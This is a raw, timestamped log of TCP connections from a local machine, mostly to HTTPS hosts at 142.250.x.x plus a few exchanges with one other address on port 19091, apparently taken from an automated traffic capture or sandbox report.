                                                                                                                                                                    Dec 30, 2024 04:59:24.937463045 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.937468052 CET44349836142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.939538002 CET49835443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.983344078 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.307038069 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.308846951 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.311880112 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.311885118 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.312038898 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.312042952 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.324342012 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.324430943 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.325437069 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.325504065 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.327204943 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.327212095 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.327589035 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.327646017 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.328063965 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.347675085 CET44349836142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.347718954 CET44349836142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.347755909 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.347762108 CET44349836142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.347773075 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.347807884 CET44349836142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.347815037 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.347879887 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.348587036 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.348594904 CET44349836142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.371331930 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.396802902 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.396878958 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.396946907 CET49835443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.397073984 CET49835443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.397102118 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.397603035 CET49841443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.397628069 CET44349841142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.397733927 CET49842443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.397761106 CET44349842142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.397762060 CET49841443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.397814035 CET49842443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.397977114 CET49841443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.397985935 CET44349841142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.398107052 CET49842443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.398119926 CET44349842142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.741528988 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.741589069 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.741601944 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.741625071 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.741640091 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.741672039 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.741677046 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.741740942 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.741754055 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.741797924 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.742326021 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.742336035 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.785384893 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.785450935 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.785473108 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.785485029 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.785543919 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.785615921 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.785628080 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.786132097 CET49846443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.786144018 CET49845443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.786178112 CET44349846142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.786183119 CET44349845142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.786415100 CET49846443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.786623001 CET49846443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:25.786639929 CET44349846142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.786644936 CET49845443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.786644936 CET49845443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:25.786695957 CET44349845142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:26.005108118 CET44349841142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:26.005171061 CET49841443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:26.005726099 CET49841443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.129182100 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.132530928 CET44349850142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.132575989 CET44349850142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.132601976 CET49850443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.132621050 CET44349850142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.132632017 CET49850443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.132662058 CET49850443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.132667065 CET44349850142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.132675886 CET44349850142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.132716894 CET49850443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.133266926 CET49850443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.133275032 CET44349850142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.133594990 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.133614063 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.133662939 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.133883953 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.133898973 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.669467926 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.670120955 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.670150042 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.670186043 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.670289993 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.670291901 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.670397997 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.670929909 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.671055079 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.673485994 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.673492908 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.673698902 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.673991919 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.675189972 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.675190926 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.675195932 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.675441980 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.675668955 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.676817894 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:28.715354919 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.719356060 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.731848955 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.732480049 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.733325005 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.733325005 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.733334064 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.733350039 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.756095886 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.756267071 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.756957054 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.756963968 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:28.757189989 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:28.757193089 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.035923958 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.035974026 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.036036015 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.036036015 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.036555052 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.036555052 CET49855443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.036577940 CET44349858142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.036592960 CET44349855142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.036669016 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.036928892 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.036943913 CET44349858142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.142577887 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.142667055 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.142750978 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.142781019 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.142925024 CET44349854142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.142992973 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.142992973 CET49854443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.143452883 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.143502951 CET44349861142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.143650055 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.143785000 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.143800974 CET44349861142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281228065 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281266928 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281305075 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.281316042 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281343937 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.281358004 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281367064 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.281440973 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.281769037 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281810999 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281882048 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.281917095 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.282082081 CET49856443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.282090902 CET44349856142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.282126904 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.282429934 CET49862443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.282433987 CET49857443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.282448053 CET44349857142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.282499075 CET44349862142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.282810926 CET49863443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.282830000 CET44349863142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.282864094 CET49862443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.282919884 CET49863443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.283061981 CET49862443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.283087015 CET44349862142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.283256054 CET49863443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:29.283262968 CET44349863142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.675601006 CET44349858142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.675693989 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.676237106 CET44349858142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.676290989 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.677890062 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.677898884 CET44349858142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.678102970 CET44349858142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.678162098 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.678509951 CET49858443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.719343901 CET44349858142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.780824900 CET44349861142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.780890942 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.781569958 CET44349861142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.781616926 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.784092903 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.784104109 CET44349861142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.784336090 CET44349861142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:29.784379005 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:29.784737110 CET49861443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.014771938 CET49869443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.014833927 CET44349869142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.014893055 CET49869443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.014976978 CET49869443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.015008926 CET44349869142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.015043974 CET44349869142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.015095949 CET49869443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.015131950 CET49869443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.015585899 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.015625954 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.015805960 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.016041994 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.016057014 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.066148996 CET44349870142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.066198111 CET44349870142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.066200972 CET49870443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.066212893 CET44349870142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.066258907 CET49870443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.066266060 CET44349870142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.066304922 CET44349870142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.066349030 CET49870443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.066870928 CET49870443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.066881895 CET44349870142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.067255020 CET49875443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.067281961 CET44349875142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.067394972 CET49875443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.067599058 CET49875443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.067610025 CET44349875142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.247920036 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.296967983 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:32.301372051 CET44349873142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.301431894 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.301810026 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.301817894 CET44349873142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.301958084 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.301963091 CET44349873142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.306071997 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.306185007 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.306466103 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.306476116 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.306580067 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.306583881 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.357688904 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:32.362449884 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.616349936 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.616405964 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.616910934 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.616923094 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.618623972 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.618628979 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.669749022 CET44349875142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.669809103 CET49875443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.670109034 CET49875443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.670115948 CET44349875142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.670397043 CET49875443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.670401096 CET44349875142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.671298981 CET44349873142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.671359062 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.671370983 CET44349873142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.671416998 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.671443939 CET44349873142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.671458006 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.671477079 CET44349873142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.671488047 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.671533108 CET49873443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.672152996 CET49878443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.672261953 CET44349878142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.672426939 CET49878443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.672589064 CET49878443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.672624111 CET44349878142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.714782000 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.714843035 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.714859962 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.714988947 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.719345093 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.719408035 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.719418049 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.719491959 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.719655991 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.719722033 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.719733953 CET44349872142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.719742060 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.719774008 CET49872443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.720115900 CET49879443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.720153093 CET44349879142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.720370054 CET49879443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.720639944 CET49879443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:32.720654964 CET44349879142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.988992929 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.989042997 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.989058971 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.989094019 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.989185095 CET49874443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.989201069 CET44349874142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.989641905 CET49880443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.989661932 CET44349880142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:32.989821911 CET49880443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:32.990056992 CET49880443192.168.2.4142.250.181.238
